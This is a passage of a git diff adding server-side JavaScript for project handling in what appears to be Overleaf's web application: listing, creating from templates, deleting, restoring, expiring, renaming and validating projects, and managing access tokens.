+            user._id,
+            'load-editor'
+          )
+          metrics.inc('features-refresh', 1, {
+            path: 'load-editor',
+            status: 'success',
+          })
+        } catch (err) {
+          // keep a record to prevent unnecessary retries and leave
+          // the original features unmodified if the refresh failed
+          req.session.feature_refresh_failed = {
+            reason: 'error',
+            at: new Date(),
+          }
+          metrics.inc('features-refresh', 1, {
+            path: 'load-editor',
+            status: 'error',
+          })
+        }
+        abortController.abort()
+        timer.done()
+        return user
+      })(),
+    ])
+  },
+  _buildProjectList(allProjects, userId) {
+    let project
+    const {
+      owned,
+      review,
+      readAndWrite,
+      readOnly,
+      tokenReadAndWrite,
+      tokenReadOnly,
+    } = allProjects
+    const projects = []
+    for (project of owned) {
+      projects.push(
+        ProjectController._buildProjectViewModel(
+          project,
+          'owner',
+          Sources.OWNER,
+          userId
+        )
+      )
+    }
+    // Invite-access
+    for (project of readAndWrite) {
+      projects.push(
+        ProjectController._buildProjectViewModel(
+          project,
+          'readWrite',
+          Sources.INVITE,
+          userId
+        )
+      )
+    }
+    for (project of review) {
+      projects.push(
+        ProjectController._buildProjectViewModel(
+          project,
+          'review',
+          Sources.INVITE,
+          userId
+        )
+      )
+    }
+    for (project of readOnly) {
+      projects.push(
+        ProjectController._buildProjectViewModel(
+          project,
+          'readOnly',
+          Sources.INVITE,
+          userId
+        )
+      )
+    }
+    // Token-access
+    // Only add these projects if they're not already present; this gives us cascading access
+    // from 'owner' => 'token-read-only'
+    for (project of tokenReadAndWrite) {
+      if (
+        projects.filter(p => p.id.toString() === project._id.toString())
+          .length === 0
+      ) {
+        projects.push(
+          ProjectController._buildProjectViewModel(
+            project,
+            'readAndWrite',
+            Sources.TOKEN,
+            userId
+          )
+        )
+      }
+    }
+    for (project of tokenReadOnly) {
+      if (
+        projects.filter(p => p.id.toString() === project._id.toString())
+          .length === 0
+      ) {
+        projects.push(
+          ProjectController._buildProjectViewModel(
+            project,
+            'readOnly',
+            Sources.TOKEN,
+            userId
+          )
+        )
+      }
+    }
+
+    return projects
+  },
+  _buildProjectViewModel(project, accessLevel, source, userId) {
+    const archived = ProjectHelper.isArchived(project, userId)
+    // If a project is simultaneously trashed and archived, we will consider it archived but not trashed.
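+    // For example (illustrative values): archived=true, trashed=true shows in
+    // the archived list only; archived=false, trashed=true shows as trashed.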
+ const trashed = ProjectHelper.isTrashed(project, userId) && !archived + + const model = { + id: project._id, + name: project.name, + lastUpdated: project.lastUpdated, + lastUpdatedBy: project.lastUpdatedBy, + publicAccessLevel: project.publicAccesLevel, + accessLevel, + source, + archived, + trashed, + owner_ref: project.owner_ref, + isV1Project: false, + } + if (accessLevel === PrivilegeLevels.READ_ONLY && source === Sources.TOKEN) { + model.owner_ref = null + model.lastUpdatedBy = null + } + return model + }, + _buildPortalTemplatesList(affiliations) { + if (affiliations == null) { + affiliations = [] + } + const portalTemplates = [] + for (const aff of affiliations) { + if ( + aff.portal && + aff.portal.slug && + aff.portal.templates_count && + aff.portal.templates_count > 0 + ) { + const portalPath = aff.institution.isUniversity ? '/edu/' : '/org/' + portalTemplates.push({ + name: aff.institution.name, + url: Settings.siteUrl + portalPath + aff.portal.slug, + }) + } + } + return portalTemplates + }, +} + +const defaultSettingsForAnonymousUser = userId => ({ + id: userId, + ace: { + mode: 'none', + theme: 'textmate', + fontSize: '12', + autoComplete: true, + spellCheckLanguage: '', + pdfViewer: '', + syntaxValidation: true, + }, + subscription: { + freeTrial: { + allowed: true, + }, + }, + featureSwitches: { + github: false, + }, + alphaProgram: false, + betaProgram: false, + writefull: { + enabled: false, + }, +}) + +const defaultUserValues = () => ({ + user: defaultSettingsForAnonymousUser(null), + learnedWords: [], + projectTags: [], + userHasInstitutionLicence: false, + subscription: undefined, + isTokenMember: false, + isInvitedMember: false, +}) + +const THEME_LIST = [ + 'cobalt', + 'dracula', + 'eclipse', + 'monokai', + 'overleaf', + 'textmate', +] + +const LEGACY_THEME_LIST = [ + 'ambiance', + 'chaos', + 'chrome', + 'clouds', + 'clouds_midnight', + 'crimson_editor', + 'dawn', + 'dreamweaver', + 'github', + 'gob', + 'gruvbox', + 'idle_fingers', + 'iplastic', + 'katzenmilch', + 'kr_theme', + 'kuroir', + 'merbivore', + 'merbivore_soft', + 'mono_industrial', + 'nord_dark', + 'pastel_on_dark', + 'solarized_dark', + 'solarized_light', + 'sqlserver', + 'terminal', + 'tomorrow', + 'tomorrow_night', + 'tomorrow_night_blue', + 'tomorrow_night_bright', + 'tomorrow_night_eighties', + 'twilight', + 'vibrant_ink', + 'xcode', +] + +const ProjectController = { + archiveProject: expressify(_ProjectController.archiveProject), + cloneProject: expressify(_ProjectController.cloneProject), + deleteProject: expressify(_ProjectController.deleteProject), + expireDeletedProject: expressify(_ProjectController.expireDeletedProject), + expireDeletedProjectsAfterDuration: expressify( + _ProjectController.expireDeletedProjectsAfterDuration + ), + loadEditor: expressify(_ProjectController.loadEditor), + newProject: expressify(_ProjectController.newProject), + projectEntitiesJson: expressify(_ProjectController.projectEntitiesJson), + renameProject: expressify(_ProjectController.renameProject), + restoreProject: expressify(_ProjectController.restoreProject), + trashProject: expressify(_ProjectController.trashProject), + unarchiveProject: expressify(_ProjectController.unarchiveProject), + untrashProject: expressify(_ProjectController.untrashProject), + updateProjectAdminSettings: expressify( + _ProjectController.updateProjectAdminSettings + ), + updateProjectSettings: expressify(_ProjectController.updateProjectSettings), + userProjectsJson: expressify(_ProjectController.userProjectsJson), + _buildProjectList: 
_ProjectController._buildProjectList, + _buildProjectViewModel: _ProjectController._buildProjectViewModel, + _injectProjectUsers: _ProjectController._injectProjectUsers, + _isInPercentageRollout: _ProjectController._isInPercentageRollout, + _refreshFeatures: _ProjectController._refreshFeatures, + _getPaywallPlansPrices: _ProjectController._getPaywallPlansPrices, + _getAddonPrices: _ProjectController._getAddonPrices, +} + +module.exports = ProjectController diff --git a/services/web/app/src/Features/Project/ProjectCreationHandler.js b/services/web/app/src/Features/Project/ProjectCreationHandler.js new file mode 100644 index 0000000..3829caa --- /dev/null +++ b/services/web/app/src/Features/Project/ProjectCreationHandler.js @@ -0,0 +1,255 @@ +const OError = require('@overleaf/o-error') +const metrics = require('@overleaf/metrics') +const Settings = require('@overleaf/settings') +const { ObjectId } = require('mongodb-legacy') +const Features = require('../../infrastructure/Features') +const { Project } = require('../../models/Project') +const { Folder } = require('../../models/Folder') +const ProjectEntityUpdateHandler = require('./ProjectEntityUpdateHandler') +const ProjectDetailsHandler = require('./ProjectDetailsHandler') +const HistoryManager = require('../History/HistoryManager') +const { User } = require('../../models/User') +const fs = require('fs') +const path = require('path') +const { callbackify } = require('util') +const _ = require('lodash') +const AnalyticsManager = require('../Analytics/AnalyticsManager') +const TpdsUpdateSender = require('../ThirdPartyDataStore/TpdsUpdateSender') +const SplitTestHandler = require('../SplitTests/SplitTestHandler') + +const MONTH_NAMES = [ + 'January', + 'February', + 'March', + 'April', + 'May', + 'June', + 'July', + 'August', + 'September', + 'October', + 'November', + 'December', +] + +const templateProjectDir = Features.hasFeature('saas') + ? 
'example-project' + : 'example-project-sp' + +async function createBlankProject( + ownerId, + projectName, + attributes = {}, + options +) { + const isImport = attributes && attributes.overleaf + const project = await _createBlankProject( + ownerId, + projectName, + attributes, + options + ) + const segmentation = _.pick(attributes, [ + 'fromV1TemplateId', + 'fromV1TemplateVersionId', + ]) + Object.assign(segmentation, attributes.segmentation) + segmentation.projectId = project._id + if (isImport) { + AnalyticsManager.recordEventForUserInBackground( + ownerId, + 'project-imported', + segmentation + ) + } else { + AnalyticsManager.recordEventForUserInBackground( + ownerId, + 'project-created', + segmentation + ) + } + return project +} + +async function createProjectFromSnippet(ownerId, projectName, docLines) { + const project = await _createBlankProject(ownerId, projectName) + AnalyticsManager.recordEventForUserInBackground(ownerId, 'project-created', { + projectId: project._id, + }) + await _createRootDoc(project, ownerId, docLines) + return project +} + +async function createBasicProject(ownerId, projectName) { + const project = await _createBlankProject(ownerId, projectName) + + const docLines = await _buildTemplate('mainbasic.tex', ownerId, projectName) + await _createRootDoc(project, ownerId, docLines) + + AnalyticsManager.recordEventForUserInBackground(ownerId, 'project-created', { + projectId: project._id, + }) + + return project +} + +async function createExampleProject(ownerId, projectName) { + const project = await _createBlankProject(ownerId, projectName) + + await _addExampleProjectFiles(ownerId, projectName, project) + + AnalyticsManager.recordEventForUserInBackground(ownerId, 'project-created', { + projectId: project._id, + }) + + return project +} + +async function _addExampleProjectFiles(ownerId, projectName, project) { + const mainDocLines = await _buildTemplate( + `${templateProjectDir}/main.tex`, + ownerId, + projectName + ) + await _createRootDoc(project, ownerId, mainDocLines) + + const bibDocLines = await _buildTemplate( + `${templateProjectDir}/sample.bib`, + ownerId, + projectName + ) + await ProjectEntityUpdateHandler.promises.addDoc( + project._id, + project.rootFolder[0]._id, + 'sample.bib', + bibDocLines, + ownerId, + null + ) + + const frogPath = path.join( + __dirname, + `/../../../templates/project_files/${templateProjectDir}/frog.jpg` + ) + await ProjectEntityUpdateHandler.promises.addFile( + project._id, + project.rootFolder[0]._id, + 'frog.jpg', + frogPath, + null, + ownerId, + null + ) +} + +async function _createBlankProject( + ownerId, + projectName, + attributes = {}, + { skipCreatingInTPDS = false } = {} +) { + metrics.inc('project-creation') + const timer = new metrics.Timer('project-creation') + await ProjectDetailsHandler.promises.validateProjectName(projectName) + + const rootFolder = new Folder({ name: 'rootFolder' }) + + attributes.lastUpdatedBy = attributes.owner_ref = new ObjectId(ownerId) + attributes.name = projectName + const project = new Project(attributes) + + // Initialise the history unless the caller has overridden it in the attributes + // (to allow scripted creation of projects without full project history) + if (project.overleaf.history.id == null && !attributes.overleaf) { + const historyId = await HistoryManager.promises.initializeProject( + project._id + ) + if (historyId != null) { + project.overleaf.history.id = historyId + } + } + + // All the projects are initialised with Full Project History. 
This property + // is still set for backwards compatibility: Server Pro requires all projects + // have it set to `true` since SP 4.0 + project.overleaf.history.display = true + + if (Settings.currentImageName) { + // avoid clobbering any imageName already set in attributes (e.g. importedImageName) + if (!project.imageName) { + project.imageName = Settings.currentImageName + } + } + project.rootFolder[0] = rootFolder + const user = await User.findById(ownerId, { + 'ace.spellCheckLanguage': 1, + _id: 1, + }) + project.spellCheckLanguage = user.ace.spellCheckLanguage + const historyRangesSupportAssignment = + await SplitTestHandler.promises.getAssignmentForUser( + user._id, + 'history-ranges-support' + ) + if (historyRangesSupportAssignment.variant === 'enabled') { + project.overleaf.history.rangesSupportEnabled = true + } + await project.save() + if (!skipCreatingInTPDS) { + await TpdsUpdateSender.promises.createProject({ + projectId: project._id, + projectName, + ownerId, + userId: ownerId, + }) + } + timer.done() + return project +} + +async function _createRootDoc(project, ownerId, docLines) { + try { + const { doc } = await ProjectEntityUpdateHandler.promises.addDoc( + project._id, + project.rootFolder[0]._id, + 'main.tex', + docLines, + ownerId, + null + ) + await ProjectEntityUpdateHandler.promises.setRootDoc(project._id, doc._id) + } catch (error) { + throw OError.tag(error, 'error adding root doc when creating project') + } +} + +async function _buildTemplate(templateName, userId, projectName) { + const user = await User.findById(userId, 'first_name last_name') + + const templatePath = path.join( + __dirname, + `/../../../templates/project_files/${templateName}` + ) + const template = fs.readFileSync(templatePath) + const data = { + project_name: projectName, + user, + year: new Date().getUTCFullYear(), + month: MONTH_NAMES[new Date().getUTCMonth()], + } + const output = _.template(template.toString())(data) + return output.split('\n') +} + +module.exports = { + createBlankProject: callbackify(createBlankProject), + createProjectFromSnippet: callbackify(createProjectFromSnippet), + createBasicProject: callbackify(createBasicProject), + createExampleProject: callbackify(createExampleProject), + promises: { + createBlankProject, + createProjectFromSnippet, + createBasicProject, + createExampleProject, + }, +} diff --git a/services/web/app/src/Features/Project/ProjectDeleter.js b/services/web/app/src/Features/Project/ProjectDeleter.js new file mode 100644 index 0000000..62d893d --- /dev/null +++ b/services/web/app/src/Features/Project/ProjectDeleter.js @@ -0,0 +1,434 @@ +const _ = require('lodash') +const { db, ObjectId } = require('../../infrastructure/mongodb') +const Modules = require('../../infrastructure/Modules') +const { callbackify } = require('util') +const { Project } = require('../../models/Project') +const { DeletedProject } = require('../../models/DeletedProject') +const { ProjectAuditLogEntry } = require('../../models/ProjectAuditLogEntry') +const Errors = require('../Errors/Errors') +const logger = require('@overleaf/logger') +const DocumentUpdaterHandler = require('../DocumentUpdater/DocumentUpdaterHandler') +const TagsHandler = require('../Tags/TagsHandler') +const ProjectHelper = require('./ProjectHelper') +const ProjectDetailsHandler = require('./ProjectDetailsHandler') +const CollaboratorsHandler = require('../Collaborators/CollaboratorsHandler') +const CollaboratorsGetter = require('../Collaborators/CollaboratorsGetter') +const DocstoreManager = 
require('../Docstore/DocstoreManager') +const EditorRealTimeController = require('../Editor/EditorRealTimeController') +const HistoryManager = require('../History/HistoryManager') +const FilestoreHandler = require('../FileStore/FileStoreHandler') +const ChatApiHandler = require('../Chat/ChatApiHandler') +const moment = require('moment') +const { promiseMapWithLimit } = require('@overleaf/promise-utils') +const { READ_PREFERENCE_SECONDARY } = require('../../infrastructure/mongodb') + +const EXPIRE_PROJECTS_AFTER_DAYS = 90 +const PROJECT_EXPIRATION_BATCH_SIZE = 10000 + +module.exports = { + markAsDeletedByExternalSource: callbackify(markAsDeletedByExternalSource), + unmarkAsDeletedByExternalSource: callbackify(unmarkAsDeletedByExternalSource), + deleteUsersProjects: callbackify(deleteUsersProjects), + expireDeletedProjectsAfterDuration: callbackify( + expireDeletedProjectsAfterDuration + ), + restoreProject: callbackify(restoreProject), + archiveProject: callbackify(archiveProject), + unarchiveProject: callbackify(unarchiveProject), + trashProject: callbackify(trashProject), + untrashProject: callbackify(untrashProject), + deleteProject: callbackify(deleteProject), + undeleteProject: callbackify(undeleteProject), + expireDeletedProject: callbackify(expireDeletedProject), + promises: { + archiveProject, + unarchiveProject, + trashProject, + untrashProject, + deleteProject, + undeleteProject, + expireDeletedProject, + markAsDeletedByExternalSource, + unmarkAsDeletedByExternalSource, + deleteUsersProjects, + expireDeletedProjectsAfterDuration, + restoreProject, + }, +} + +async function markAsDeletedByExternalSource(projectId) { + logger.debug( + { projectId }, + 'marking project as deleted by external data source' + ) + await Project.updateOne( + { _id: projectId }, + { deletedByExternalDataSource: true } + ).exec() + EditorRealTimeController.emitToRoom( + projectId, + 'projectRenamedOrDeletedByExternalSource' + ) +} + +async function unmarkAsDeletedByExternalSource(projectId) { + await Project.updateOne( + { _id: projectId }, + { deletedByExternalDataSource: false } + ).exec() +} + +async function deleteUsersProjects(userId) { + const projects = await Project.find({ owner_ref: userId }).exec() + await promiseMapWithLimit(5, projects, project => deleteProject(project._id)) + await CollaboratorsHandler.promises.removeUserFromAllProjects(userId) +} + +async function expireDeletedProjectsAfterDuration() { + const deletedProjects = await DeletedProject.find( + { + 'deleterData.deletedAt': { + $lt: new Date(moment().subtract(EXPIRE_PROJECTS_AFTER_DAYS, 'days')), + }, + project: { $type: 'object' }, + }, + { 'deleterData.deletedProjectId': 1 } + ) + .limit(PROJECT_EXPIRATION_BATCH_SIZE) + .read(READ_PREFERENCE_SECONDARY) + const projectIds = _.shuffle( + deletedProjects.map( + deletedProject => deletedProject.deleterData.deletedProjectId + ) + ) + for (const projectId of projectIds) { + await expireDeletedProject(projectId) + } +} + +async function restoreProject(projectId) { + await Project.updateOne( + { _id: projectId }, + { $unset: { archived: true } } + ).exec() +} + +async function archiveProject(projectId, userId) { + try { + const project = await Project.findOne({ _id: projectId }).exec() + if (!project) { + throw new Errors.NotFoundError('project not found') + } + const archived = ProjectHelper.calculateArchivedArray( + project, + userId, + 'ARCHIVE' + ) + + await Project.updateOne( + { _id: projectId }, + { $set: { archived }, $pull: { trashed: new ObjectId(userId) } } + ) + } catch (err) 
{ + logger.warn({ err }, 'problem archiving project') + throw err + } +} + +async function unarchiveProject(projectId, userId) { + try { + const project = await Project.findOne({ _id: projectId }).exec() + if (!project) { + throw new Errors.NotFoundError('project not found') + } + + const archived = ProjectHelper.calculateArchivedArray( + project, + userId, + 'UNARCHIVE' + ) + + await Project.updateOne({ _id: projectId }, { $set: { archived } }) + } catch (err) { + logger.warn({ err }, 'problem unarchiving project') + throw err + } +} + +async function trashProject(projectId, userId) { + try { + const project = await Project.findOne({ _id: projectId }).exec() + if (!project) { + throw new Errors.NotFoundError('project not found') + } + + const archived = ProjectHelper.calculateArchivedArray( + project, + userId, + 'UNARCHIVE' + ) + + await Project.updateOne( + { _id: projectId }, + { + $addToSet: { trashed: new ObjectId(userId) }, + $set: { archived }, + } + ) + } catch (err) { + logger.warn({ err }, 'problem trashing project') + throw err + } +} + +async function untrashProject(projectId, userId) { + try { + const project = await Project.findOne({ _id: projectId }).exec() + if (!project) { + throw new Errors.NotFoundError('project not found') + } + + await Project.updateOne( + { _id: projectId }, + { $pull: { trashed: new ObjectId(userId) } } + ) + } catch (err) { + logger.warn({ err }, 'problem untrashing project') + throw err + } +} + +async function deleteProject(projectId, options = {}) { + try { + const project = await Project.findOne({ _id: projectId }).exec() + if (!project) { + throw new Errors.NotFoundError('project not found') + } + + await DocumentUpdaterHandler.promises.flushProjectToMongoAndDelete( + projectId + ) + + try { + // OPTIMIZATION: flush docs out of mongo + await DocstoreManager.promises.archiveProject(projectId) + } catch (err) { + // It is OK to fail here, the docs will get hard-deleted eventually after + // the grace-period for soft-deleted projects has passed. + logger.warn( + { projectId, err }, + 'failed archiving doc via docstore as part of project soft-deletion' + ) + } + + const memberIds = await CollaboratorsGetter.promises.getMemberIds(projectId) + + // fire these jobs in the background + for (const memberId of memberIds) { + TagsHandler.promises + .removeProjectFromAllTags(memberId, projectId) + .catch(err => { + logger.err( + { err, memberId, projectId }, + 'failed to remove project from tags' + ) + }) + } + + const deleterData = { + deletedAt: new Date(), + deleterId: + options.deleterUser != null ? options.deleterUser._id : undefined, + deleterIpAddress: options.ipAddress, + deletedProjectId: project._id, + deletedProjectOwnerId: project.owner_ref, + deletedProjectCollaboratorIds: project.collaberator_refs, + deletedProjectReadOnlyIds: project.readOnly_refs, + deletedProjectReviewerIds: project.reviewer_refs, + deletedProjectReadWriteTokenAccessIds: + project.tokenAccessReadAndWrite_refs, + deletedProjectOverleafId: project.overleaf + ? project.overleaf.id + : undefined, + deletedProjectOverleafHistoryId: + project.overleaf && project.overleaf.history + ? project.overleaf.history.id + : undefined, + deletedProjectReadOnlyTokenAccessIds: project.tokenAccessReadOnly_refs, + deletedProjectReadWriteToken: project.tokens.readAndWrite, + deletedProjectReadOnlyToken: project.tokens.readOnly, + deletedProjectLastUpdatedAt: project.lastUpdated, + } + + Object.keys(deleterData).forEach(key => + deleterData[key] === undefined ? 
delete deleterData[key] : '' + ) + + await DeletedProject.updateOne( + { 'deleterData.deletedProjectId': projectId }, + { project, deleterData }, + { upsert: true } + ) + + await Project.deleteOne({ _id: projectId }).exec() + } catch (err) { + logger.warn({ err }, 'problem deleting project') + throw err + } + + logger.debug({ projectId }, 'successfully deleted project') +} + +async function undeleteProject(projectId, options = {}) { + projectId = new ObjectId(projectId) + const deletedProject = await DeletedProject.findOne({ + 'deleterData.deletedProjectId': projectId, + }).exec() + + if (!deletedProject) { + throw new Errors.NotFoundError('project_not_found') + } + + if (!deletedProject.project) { + throw new Errors.NotFoundError('project_too_old_to_restore') + } + + const restored = new Project(deletedProject.project) + + if (options.userId) { + restored.owner_ref = options.userId + } + + // if we're undeleting, we want the document to show up + restored.name = await ProjectDetailsHandler.promises.generateUniqueName( + deletedProject.deleterData.deletedProjectOwnerId, + restored.name + ' (Restored)' + ) + restored.archived = undefined + + if (restored.deletedDocs && restored.deletedDocs.length > 0) { + await promiseMapWithLimit(10, restored.deletedDocs, async deletedDoc => { + // back fill context of deleted docs + const { _id: docId, name, deletedAt } = deletedDoc + await DocstoreManager.promises.deleteDoc( + projectId, + docId, + name, + deletedAt + ) + }) + restored.deletedDocs = [] + } + if (restored.deletedFiles && restored.deletedFiles.length > 0) { + filterDuplicateDeletedFilesInPlace(restored) + const deletedFiles = restored.deletedFiles.map(file => { + // break free from the model + file = file.toObject() + + // add projectId + file.projectId = projectId + return file + }) + await db.deletedFiles.insertMany(deletedFiles) + restored.deletedFiles = [] + } + + // we can't use Mongoose to re-insert the project, as it won't + // create a new document with an _id already specified. We need to + // insert it directly into the collection + + await db.projects.insertOne(restored) + await DeletedProject.deleteOne({ _id: deletedProject._id }).exec() +} + +async function expireDeletedProject(projectId) { + try { + const activeProject = await Project.findById(projectId).exec() + if (activeProject) { + // That project is active. The deleted project record might be there + // because of an incomplete delete or undelete operation. Clean it up and + // return. 
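+      // (Both deletes below are no-ops when the records are already gone, so
+      // this cleanup is idempotent and safe to re-run after a crash.)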
+ await DeletedProject.deleteOne({ + 'deleterData.deletedProjectId': projectId, + }) + await ProjectAuditLogEntry.deleteMany({ projectId }) + return + } + const deletedProject = await DeletedProject.findOne({ + 'deleterData.deletedProjectId': projectId, + }).exec() + if (!deletedProject) { + throw new Errors.NotFoundError( + `No deleted project found for project id ${projectId}` + ) + } + if (!deletedProject.project) { + logger.warn( + { projectId }, + `Attempted to expire already-expired deletedProject` + ) + return + } + + const historyId = + deletedProject.project.overleaf && + deletedProject.project.overleaf.history && + deletedProject.project.overleaf.history.id + + await Promise.all([ + DocstoreManager.promises.destroyProject(deletedProject.project._id), + HistoryManager.promises.deleteProject( + deletedProject.project._id, + historyId + ), + FilestoreHandler.promises.deleteProject(deletedProject.project._id), + ChatApiHandler.promises.destroyProject(deletedProject.project._id), + hardDeleteDeletedFiles(deletedProject.project._id), + ProjectAuditLogEntry.deleteMany({ projectId }), + Modules.promises.hooks.fire('projectExpired', deletedProject.project._id), + ]) + + await DeletedProject.updateOne( + { + _id: deletedProject._id, + }, + { + $set: { + 'deleterData.deleterIpAddress': null, + project: null, + }, + } + ).exec() + } catch (error) { + logger.warn({ projectId, error }, 'error expiring deleted project') + throw error + } +} + +function filterDuplicateDeletedFilesInPlace(project) { + const fileIds = new Set() + project.deletedFiles = project.deletedFiles.filter(file => { + const id = file._id.toString() + if (fileIds.has(id)) return false + fileIds.add(id) + return true + }) +} + +let deletedFilesProjectIdIndexExist +async function doesDeletedFilesProjectIdIndexExist() { + if (typeof deletedFilesProjectIdIndexExist !== 'boolean') { + // Resolve this about once. No need for locking or retry handling. 
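+    // Lazy, lock-free memoisation: the first call pays for the probe and the
+    // module-level variable caches the boolean for every later call. The same
+    // pattern in isolation (`probe` is an illustrative stand-in, not a real
+    // helper in this codebase):
+    //
+    //   let cached
+    //   async function hasIndex() {
+    //     if (typeof cached !== 'boolean') cached = await probe()
+    //     return cached
+    //   }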
+ deletedFilesProjectIdIndexExist = + await db.deletedFiles.indexExists('projectId_1') + } + return deletedFilesProjectIdIndexExist +} + +async function hardDeleteDeletedFiles(projectId) { + if (!(await doesDeletedFilesProjectIdIndexExist())) { + // Running the deletion command w/o index would kill mongo performance + return + } + return db.deletedFiles.deleteMany({ projectId }) +} diff --git a/services/web/app/src/Features/Project/ProjectDetailsHandler.js b/services/web/app/src/Features/Project/ProjectDetailsHandler.js new file mode 100644 index 0000000..33551ab --- /dev/null +++ b/services/web/app/src/Features/Project/ProjectDetailsHandler.js @@ -0,0 +1,250 @@ +const _ = require('lodash') +const ProjectGetter = require('./ProjectGetter') +const UserGetter = require('../User/UserGetter') +const { Project } = require('../../models/Project') +const logger = require('@overleaf/logger') +const TpdsUpdateSender = require('../ThirdPartyDataStore/TpdsUpdateSender') +const PublicAccessLevels = require('../Authorization/PublicAccessLevels') +const Errors = require('../Errors/Errors') +const TokenGenerator = require('../TokenGenerator/TokenGenerator') +const ProjectHelper = require('./ProjectHelper') +const settings = require('@overleaf/settings') +const { callbackify } = require('util') + +const MAX_PROJECT_NAME_LENGTH = 150 + +module.exports = { + MAX_PROJECT_NAME_LENGTH, + getDetails: callbackify(getDetails), + getProjectDescription: callbackify(getProjectDescription), + setProjectDescription: callbackify(setProjectDescription), + renameProject: callbackify(renameProject), + validateProjectName: callbackify(validateProjectName), + generateUniqueName: callbackify(generateUniqueName), + setPublicAccessLevel: callbackify(setPublicAccessLevel), + ensureTokensArePresent: callbackify(ensureTokensArePresent), + clearTokens: callbackify(clearTokens), + fixProjectName, + promises: { + getDetails, + getProjectDescription, + setProjectDescription, + renameProject, + validateProjectName, + generateUniqueName, + setPublicAccessLevel, + ensureTokensArePresent, + clearTokens, + }, +} + +async function getDetails(projectId) { + let project + try { + project = await ProjectGetter.promises.getProject(projectId, { + name: true, + description: true, + compiler: true, + features: true, + owner_ref: true, + overleaf: true, + }) + } catch (err) { + logger.warn({ err, projectId }, 'error getting project') + throw err + } + if (project == null) { + throw new Errors.NotFoundError('project not found') + } + const user = await UserGetter.promises.getUser(project.owner_ref) + const details = { + name: project.name, + description: project.description, + compiler: project.compiler, + features: + user != null && user.features != null + ? 
user.features + : settings.defaultFeatures, + } + if (project.overleaf != null) { + details.overleaf = project.overleaf + } + return details +} + +async function getProjectDescription(projectId) { + const project = await ProjectGetter.promises.getProject(projectId, { + description: true, + }) + if (project == null) { + return undefined + } + return project.description +} + +async function setProjectDescription(projectId, description) { + const conditions = { _id: projectId } + const update = { description } + logger.debug( + { conditions, update, projectId, description }, + 'setting project description' + ) + try { + await Project.updateOne(conditions, update).exec() + } catch (err) { + logger.warn({ err }, 'something went wrong setting project description') + throw err + } +} +async function renameProject(projectId, newName) { + newName = newName.trim() + await validateProjectName(newName) + logger.debug({ projectId, newName }, 'renaming project') + let project + try { + project = await ProjectGetter.promises.getProject(projectId, { name: true }) + } catch (err) { + logger.warn({ err, projectId }, 'error getting project') + throw err + } + if (project == null) { + logger.warn({ projectId }, 'could not find project to rename') + return + } + const oldProjectName = project.name + await Project.updateOne({ _id: projectId }, { name: newName }).exec() + await TpdsUpdateSender.promises.moveEntity({ + projectId, + projectName: oldProjectName, + newProjectName: newName, + }) +} + +async function validateProjectName(name) { + if (name == null || name.length === 0) { + throw new Errors.InvalidNameError('Project name cannot be blank') + } + if (name.length > MAX_PROJECT_NAME_LENGTH) { + throw new Errors.InvalidNameError('Project name is too long') + } + if (name.indexOf('/') > -1) { + throw new Errors.InvalidNameError( + 'Project name cannot contain / characters' + ) + } + if (name.indexOf('\\') > -1) { + throw new Errors.InvalidNameError( + 'Project name cannot contain \\ characters' + ) + } + if (name !== name.trim()) { + throw new Errors.InvalidNameError( + 'Project name cannot start or end with whitespace' + ) + } +} + +// FIXME: we should put a lock around this to make it completely safe, but we would need to do that at +// the point of project creation, rather than just checking the name at the start of the import. +// If we later move this check into ProjectCreationHandler we can ensure all new projects are created +// with a unique name. But that requires thinking through how we would handle incoming projects from +// dropbox for example. +async function generateUniqueName(userId, name, suffixes = []) { + const allUsersProjectNames = + await ProjectGetter.promises.findAllUsersProjects(userId, { name: 1 }) + // allUsersProjectNames is returned as a hash {owned: [name1, name2, ...], readOnly: [....]} + // collect all of the names and flatten them into a single array + const projectNameList = _.map( + _.flattenDeep(_.values(allUsersProjectNames)), + 'name' + ) + const uniqueName = await ProjectHelper.promises.ensureNameIsUnique( + projectNameList, + name, + suffixes, + MAX_PROJECT_NAME_LENGTH + ) + return uniqueName +} + +function fixProjectName(name) { + // Remove any leading or trailing whitespace + name = typeof name === 'string' ? 
name.trim() : '' + // Apply a default name if the name is empty + if (name === '') { + name = 'Untitled' + } + if (name.indexOf('/') > -1) { + // v2 does not allow / in a project name + name = name.replace(/\//g, '-') + } + if (name.indexOf('\\') > -1) { + // backslashes in project name will prevent syncing to dropbox + name = name.replace(/\\/g, '') + } + if (name.length > MAX_PROJECT_NAME_LENGTH) { + name = name.substr(0, MAX_PROJECT_NAME_LENGTH) + } + // Remove any leading or trailing whitespace after fixing + name = name.trim() + return name +} + +async function setPublicAccessLevel(projectId, newAccessLevel) { + if ( + projectId != null && + newAccessLevel != null && + _.includes( + [PublicAccessLevels.PRIVATE, PublicAccessLevels.TOKEN_BASED], + newAccessLevel + ) + ) { + await Project.updateOne( + { _id: projectId }, + { publicAccesLevel: newAccessLevel } + ).exec() + } else { + throw new Errors.InvalidError('unexpected access level') + } +} + +async function ensureTokensArePresent(projectId) { + const project = await ProjectGetter.promises.getProject(projectId, { + tokens: 1, + }) + if ( + project.tokens != null && + project.tokens.readOnly != null && + project.tokens.readAndWrite != null + ) { + return + } + await _generateTokens(project) + await Project.updateOne( + { _id: projectId }, + { $set: { tokens: project.tokens } } + ).exec() +} + +async function clearTokens(projectId) { + await Project.updateOne( + { _id: projectId }, + { $unset: { tokens: 1 }, $set: { publicAccesLevel: 'private' } } + ).exec() +} + +async function _generateTokens(project, callback) { + if (!project.tokens) { + project.tokens = {} + } + const { tokens } = project + if (tokens.readAndWrite == null) { + const { token, numericPrefix } = TokenGenerator.readAndWriteToken() + tokens.readAndWrite = token + tokens.readAndWritePrefix = numericPrefix + } + if (tokens.readOnly == null) { + tokens.readOnly = + await TokenGenerator.promises.generateUniqueReadOnlyToken() + } +} diff --git a/services/web/app/src/Features/Project/ProjectDuplicator.js b/services/web/app/src/Features/Project/ProjectDuplicator.js new file mode 100644 index 0000000..47c00ed --- /dev/null +++ b/services/web/app/src/Features/Project/ProjectDuplicator.js @@ -0,0 +1,312 @@ +const { callbackify } = require('util') +const Path = require('path') +const logger = require('@overleaf/logger') +const OError = require('@overleaf/o-error') +const { promiseMapWithLimit } = require('@overleaf/promise-utils') +const { Doc } = require('../../models/Doc') +const { File } = require('../../models/File') +const DocstoreManager = require('../Docstore/DocstoreManager') +const DocumentUpdaterHandler = require('../DocumentUpdater/DocumentUpdaterHandler') +const FileStoreHandler = require('../FileStore/FileStoreHandler') +const HistoryManager = require('../History/HistoryManager') +const ProjectCreationHandler = require('./ProjectCreationHandler') +const ProjectDeleter = require('./ProjectDeleter') +const ProjectEntityMongoUpdateHandler = require('./ProjectEntityMongoUpdateHandler') +const 